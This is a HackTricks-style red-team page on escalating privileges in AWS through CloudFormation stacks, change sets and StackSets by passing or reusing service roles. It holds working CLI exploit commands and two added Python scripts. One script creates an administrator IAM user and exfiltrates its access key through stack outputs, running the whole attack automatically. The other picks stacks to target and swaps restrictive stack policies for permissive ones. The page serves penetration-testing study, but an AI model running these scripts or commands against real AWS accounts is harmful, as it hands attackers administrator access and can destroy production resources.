# AWS - Cloudformation Privesc {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! * **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}

## cloudformation

For more information about cloudformation check:

{% content-ref url="../../aws-services/aws-cloudformation-and-codestar-enum.md" %}
[aws-cloudformation-and-codestar-enum.md](../../aws-services/aws-cloudformation-and-codestar-enum.md)
{% endcontent-ref %}

### `iam:PassRole`, `cloudformation:CreateStack`

An attacker with these permissions **can escalate privileges** by creating a **CloudFormation stack** from a template they control and passing a **service role** to it: every resource in the template is then created with the permissions of that role, not with the caller's. Two things to check first: the role's trust policy must trust `cloudformation.amazonaws.com` (otherwise CloudFormation cannot assume it), and `--template-url` must point to an object in S3 (a public bucket the attacker owns works, as in the examples below); a template served from an arbitrary web server must be passed with `--template-body file://...` instead. If the template creates IAM resources, add `--capabilities CAPABILITY_IAM` (or `CAPABILITY_NAMED_IAM` when they have custom names).

```bash
aws cloudformation create-stack --stack-name <stack-name> \
  --template-url https://<attacker-bucket>.s3.amazonaws.com/attackers.template \
  --role-arn <role-arn>
```

In the following page you have an **exploitation example** with the additional permission **`cloudformation:DescribeStacks`** (needed to read the stack outputs, for example credentials created by the template):

{% content-ref url="iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md" %}
[iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md](iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md)
{% endcontent-ref %}

**Potential Impact:** Privesc to the cloudformation service role specified.

### `iam:PassRole`, (`cloudformation:UpdateStack` | `cloudformation:SetStackPolicy`)

In this case you can **abuse an existing cloudformation stack**: update it with your own template and pass a service role, escalating exactly as in the previous scenario:

```bash
aws cloudformation update-stack \
  --stack-name privesc \
  --template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \
  --role-arn arn:aws:iam::123456789012:role/CloudFormationAdmin2 \
  --capabilities CAPABILITY_IAM \
  --region eu-west-1
```

Note the flag is `--role-arn` (there is no `--role`), and that `--capabilities CAPABILITY_IAM` (or `CAPABILITY_NAMED_IAM` when the IAM resources carry custom names) is required or CloudFormation rejects a template that creates IAM resources. An update also replaces the stack's current resources with whatever your template declares, so it is both noisy and destructive.

A stack policy does not grant IAM permissions; it only restricts which of the stack's resources an update may modify, replace or delete. `cloudformation:SetStackPolicy` therefore matters when the target stack carries a policy that denies updates to the resources you need to change: replace it with a permissive one (a stack policy can be overwritten but never deleted) and then run the `UpdateStack` you are already allowed to perform.

**Potential Impact:** Privesc to the cloudformation service role specified.
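The template the commands above fetch (`attackers.template` / `IAMCreateUserTemplate.json`) is never shown on this page. The following is an added example, not the page's or Rhino Security Labs' own code: it builds a template that makes the passed service role create an IAM admin user plus an access key and leak the key through the stack Outputs, works out which `--capabilities` value the template needs, and drives the CreateStack/UpdateStack flow through the AWS CLI. The logical resource names `PrivescUser`/`PrivescKey`, the bucket URL, the role ARN and the sample `describe-stacks` response are assumptions made for illustration.

```python
"""Added example (not the page's own code): attacker-controlled CloudFormation template,
capability check and CLI driver for the CreateStack / UpdateStack privesc.
Resource names, bucket URL, role ARN and the sample response are assumptions."""
import json
import subprocess
from typing import Dict, List, Optional

ADMIN_POLICY = "arn:aws:iam::aws:policy/AdministratorAccess"

# IAM resource types whose custom-name property turns CAPABILITY_IAM into CAPABILITY_NAMED_IAM.
NAMED_IAM_PROPERTY = {
    "AWS::IAM::User": "UserName",
    "AWS::IAM::Role": "RoleName",
    "AWS::IAM::Group": "GroupName",
    "AWS::IAM::ManagedPolicy": "ManagedPolicyName",
    "AWS::IAM::InstanceProfile": "InstanceProfileName",
}


def privesc_template(user_name: Optional[str] = None) -> Dict:
    """Template that makes CloudFormation's service role create an IAM user with
    AdministratorAccess and an access key, and leaks the key pair through the stack
    Outputs so that cloudformation:DescribeStacks hands it back to the attacker."""
    user_props: Dict = {"ManagedPolicyArns": [ADMIN_POLICY]}
    if user_name:  # an explicit name is easier to spot in IAM and needs CAPABILITY_NAMED_IAM
        user_props["UserName"] = user_name
    return {
        "AWSTemplateFormatVersion": "2010-09-09",
        "Description": "IAM user + access key created through the CloudFormation service role",
        "Resources": {
            "PrivescUser": {"Type": "AWS::IAM::User", "Properties": user_props},
            "PrivescKey": {
                "Type": "AWS::IAM::AccessKey",
                "Properties": {"UserName": {"Ref": "PrivescUser"}},
            },
        },
        "Outputs": {
            "AccessKeyId": {"Value": {"Ref": "PrivescKey"}},
            "SecretAccessKey": {"Value": {"Fn::GetAtt": ["PrivescKey", "SecretAccessKey"]}},
        },
    }


def required_capabilities(template: Dict) -> List[str]:
    """CloudFormation refuses a template with IAM resources unless the caller acknowledges
    CAPABILITY_IAM; if any IAM resource carries a custom name it wants CAPABILITY_NAMED_IAM."""
    caps: List[str] = []
    for res in template.get("Resources", {}).values():
        rtype = res.get("Type", "")
        if not rtype.startswith("AWS::IAM::"):
            continue
        name_prop = NAMED_IAM_PROPERTY.get(rtype)
        if name_prop and name_prop in res.get("Properties", {}):
            return ["CAPABILITY_NAMED_IAM"]
        caps = ["CAPABILITY_IAM"]
    return caps


def create_stack_cmd(stack_name: str, template_url: str, role_arn: Optional[str],
                     capabilities: List[str], region: str, update: bool = False) -> List[str]:
    """argv for create-stack (or update-stack). role_arn=None omits --role-arn: that is the
    no-iam:PassRole variant, where CloudFormation keeps the role already attached to the stack."""
    cmd = ["aws", "cloudformation", "update-stack" if update else "create-stack",
           "--stack-name", stack_name, "--template-url", template_url, "--region", region]
    if role_arn:
        cmd += ["--role-arn", role_arn]
    if capabilities:
        cmd += ["--capabilities", *capabilities]
    return cmd


def outputs_from_describe(describe: Dict) -> Dict[str, str]:
    """Flatten the Outputs of the first stack in a describe-stacks JSON response."""
    stack = describe["Stacks"][0]
    return {o["OutputKey"]: o["OutputValue"] for o in stack.get("Outputs", [])}


def run_privesc(stack_name: str, template_url: str, role_arn: str, region: str) -> Dict[str, str]:
    """Create the stack, wait for it and return the leaked credentials.
    Needs AWS credentials and the template already uploaded to template_url."""
    caps = required_capabilities(privesc_template())
    subprocess.run(create_stack_cmd(stack_name, template_url, role_arn, caps, region), check=True)
    subprocess.run(["aws", "cloudformation", "wait", "stack-create-complete",
                    "--stack-name", stack_name, "--region", region], check=True)
    out = subprocess.run(["aws", "cloudformation", "describe-stacks", "--stack-name", stack_name,
                          "--region", region, "--output", "json"],
                         check=True, capture_output=True, text=True).stdout
    return outputs_from_describe(json.loads(out))


# Constructed describe-stacks response; the key pair is the AWS documentation example, not a real one.
SAMPLE_DESCRIBE = {"Stacks": [{"StackName": "privesc", "StackStatus": "CREATE_COMPLETE", "Outputs": [
    {"OutputKey": "AccessKeyId", "OutputValue": "AKIAIOSFODNN7EXAMPLE"},
    {"OutputKey": "SecretAccessKey", "OutputValue": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"}]}]}

if __name__ == "__main__":
    # Save this as IAMCreateUserTemplate.json, upload it to your bucket, then call run_privesc().
    print(json.dumps(privesc_template(), indent=2))
```

Running the file prints the template to upload; `run_privesc("privesc", "https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json", "arn:aws:iam::123456789012:role/CloudFormationAdmin", "eu-west-1")` then performs the CreateStack, waits with the CLI waiter instead of a fixed sleep, and returns the `AccessKeyId`/`SecretAccessKey` outputs. Because the secret is written to the stack Outputs it is also visible to anyone with `DescribeStacks` on that stack, which is why the page's exploitation example needs that permission.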
### `cloudformation:UpdateStack` | `cloudformation:SetStackPolicy`

If you have this permission but **no `iam:PassRole`** you can still **update stacks that already have a service role attached** and abuse that role: when `--role-arn` is omitted, CloudFormation keeps using the role previously associated with the stack. Find candidate stacks with `aws cloudformation describe-stacks --query 'Stacks[?RoleARN].[StackName,RoleARN]' --output text`, then run the update from the previous section without the `--role-arn` flag.

As in the previous section, `cloudformation:SetStackPolicy` does not grant update rights by itself; it lets you replace a stack policy that would otherwise block the update of the protected resources.

**Potential Impact:** Privesc to the cloudformation service role already attached.

### `iam:PassRole`, ((`cloudformation:CreateChangeSet`, `cloudformation:ExecuteChangeSet`) | `cloudformation:SetStackPolicy`)

An attacker with permissions to **pass a role and create & execute a ChangeSet** can **create or update a cloudformation stack and abuse the cloudformation service role** just like with CreateStack or UpdateStack. The following exploit is a **variation of the** [**CreateStack one**](./#iam-passrole-cloudformation-createstack) using the **ChangeSet permissions** to create a stack:

```bash
aws cloudformation create-change-set \
  --stack-name privesc \
  --change-set-name privesc \
  --change-set-type CREATE \
  --template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \
  --role-arn arn:aws:iam::947247140022:role/CloudFormationAdmin \
  --capabilities CAPABILITY_IAM \
  --region eu-west-1

# Wait for the change set to be ready instead of sleeping a fixed time
aws cloudformation wait change-set-create-complete \
  --change-set-name privesc \
  --stack-name privesc \
  --region eu-west-1

aws cloudformation execute-change-set \
  --change-set-name privesc \
  --stack-name privesc \
  --region eu-west-1

# Wait for the stack to finish, then read its outputs (the created credentials)
aws cloudformation wait stack-create-complete \
  --stack-name privesc \
  --region eu-west-1

aws cloudformation describe-stacks \
  --stack-name privesc \
  --region eu-west-1
```

Here too `cloudformation:SetStackPolicy` only lets you replace a stack policy that would deny the ChangeSet's updates to protected resources; it does not grant the ChangeSet permissions themselves.

**Potential Impact:** Privesc to cloudformation service roles.
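For the variants without `iam:PassRole` (the `UpdateStack` one above and the `--change-set-type UPDATE` one below) you first need a stack that already carries a service role, and you need to know whether its stack policy will let your update through. The following is an added example, not the page's own code: it picks the stacks with a `RoleARN` out of a `describe-stacks` response and implements a simplified evaluation of a stack policy (explicit Deny wins, everything not explicitly allowed is denied once a policy exists) so you can tell in advance which resources are protected and whether you need `SetStackPolicy` before `UpdateStack`. Stack names, ARNs and the sample policy are constructed for illustration; `NotAction`/`NotResource` and conditions other than `ResourceType` are not modelled.

```python
"""Added example (not the page's own code): target selection and stack-policy check for the
no-iam:PassRole UpdateStack / ChangeSet UPDATE variants. Sample data is constructed."""
import fnmatch
import json
from typing import Dict, List, Optional, Tuple

UPDATE_ACTIONS = ("Update:Modify", "Update:Replace", "Update:Delete")

# Policy to install with set-stack-policy: a stack policy can be overwritten but never
# removed once set, so "lifting" it means replacing it with an allow-all one.
PERMISSIVE_STACK_POLICY = {"Statement": [{"Effect": "Allow", "Action": "Update:*",
                                          "Principal": "*", "Resource": "*"}]}


def stacks_with_service_role(describe_stacks: Dict) -> List[Tuple[str, str]]:
    """Stacks whose updates run under an already-attached service role (RoleARN set);
    these are the only useful targets when you cannot pass a role yourself."""
    return [(s["StackName"], s["RoleARN"])
            for s in describe_stacks.get("Stacks", []) if s.get("RoleARN")]


def _matches(patterns, value: str) -> bool:
    """Stack-policy Action/Resource values are a string or list and allow '*' wildcards."""
    pats = patterns if isinstance(patterns, list) else [patterns]
    return any(fnmatch.fnmatchcase(value, p) for p in pats)


def stack_policy_allows(policy: Optional[Dict], logical_id: str, action: str,
                        resource_type: Optional[str] = None) -> bool:
    """Simplified evaluation of one Update:* action on one resource: no policy means
    everything is allowed; with a policy each resource is denied unless a statement allows
    it, and an explicit Deny always wins. Only StringEquals/StringLike on ResourceType
    conditions are modelled (NotAction/NotResource are not)."""
    if policy is None:
        return True
    allowed = False
    for stmt in policy.get("Statement", []):
        if not _matches(stmt.get("Action", []), action):
            continue
        if not _matches(stmt.get("Resource", []), f"LogicalResourceId/{logical_id}"):
            continue
        cond = stmt.get("Condition", {})
        type_pats = (cond.get("StringEquals", {}).get("ResourceType")
                     or cond.get("StringLike", {}).get("ResourceType"))
        if type_pats is not None and not (resource_type and _matches(type_pats, resource_type)):
            continue
        if stmt.get("Effect") == "Deny":
            return False
        if stmt.get("Effect") == "Allow":
            allowed = True
    return allowed


def blocked_resources(policy: Optional[Dict], logical_ids: List[str], action: str) -> List[str]:
    """Logical ids of the given resources that the policy would stop 'action' from touching."""
    return [lid for lid in logical_ids if not stack_policy_allows(policy, lid, action)]


def set_stack_policy_cmd(stack_name: str, region: str,
                         policy: Dict = PERMISSIVE_STACK_POLICY) -> List[str]:
    """argv for cloudformation:SetStackPolicy, passing the replacement policy inline."""
    return ["aws", "cloudformation", "set-stack-policy", "--stack-name", stack_name,
            "--stack-policy-body", json.dumps(policy), "--region", region]


# Constructed describe-stacks response: one stack with a service role, one without.
SAMPLE_DESCRIBE = {"Stacks": [
    {"StackName": "webapp-prod", "StackStatus": "UPDATE_COMPLETE",
     "RoleARN": "arn:aws:iam::123456789012:role/CloudFormationAdmin"},
    {"StackName": "scratch", "StackStatus": "CREATE_COMPLETE"},
]}
# Constructed stack policy in the usual production shape: protect the database, allow the rest.
SAMPLE_POLICY = {"Statement": [
    {"Effect": "Deny", "Action": "Update:*", "Principal": "*",
     "Resource": "LogicalResourceId/ProductionDatabase"},
    {"Effect": "Allow", "Action": "Update:*", "Principal": "*", "Resource": "*"},
]}

if __name__ == "__main__":
    for name, role in stacks_with_service_role(SAMPLE_DESCRIBE):
        print(f"{name}: updates run as {role}")
        for action in UPDATE_ACTIONS:
            print(f"  {action} blocked on:", blocked_resources(SAMPLE_POLICY, ["ProductionDatabase", "WebServer"], action))
    print(" ".join(set_stack_policy_cmd("webapp-prod", "eu-west-1")))
```

In practice feed `stacks_with_service_role` the output of `aws cloudformation describe-stacks --output json` and `stack_policy_allows` the `StackPolicyBody` from `aws cloudformation get-stack-policy --stack-name <name>` (it is returned as a JSON string, so `json.loads` it first). If `blocked_resources` is empty for the resources your template changes, `UpdateStack` alone is enough; otherwise you need `SetStackPolicy` to install the permissive policy first.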
### (`cloudformation:CreateChangeSet`, `cloudformation:ExecuteChangeSet`) | `cloudformation:SetStackPolicy`

This is like the previous method without passing **IAM roles**, so you can only **abuse a role already attached** to an existing stack: leave out `--role-arn`, point `--stack-name` at a stack that has a service role, and change the parameter to

```
--change-set-type UPDATE
```

**Potential Impact:** Privesc to the cloudformation service role already attached.

### `iam:PassRole`, (`cloudformation:CreateStackSet` | `cloudformation:UpdateStackSet`)

An attacker could abuse these permissions to create/update StackSets and pass an arbitrary cloudformation role to them (`--administration-role-arn` / `--execution-role-name`), so that the stack instances deployed by the StackSet run with that role's permissions.

**Potential Impact:** Privesc to cloudformation service roles.

### `cloudformation:UpdateStackSet`

An attacker could abuse this permission without the PassRole permission to update existing StackSets and abuse the cloudformation roles they already have attached.

**Potential Impact:** Privesc to the attached cloudformation roles.

## References

* [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/)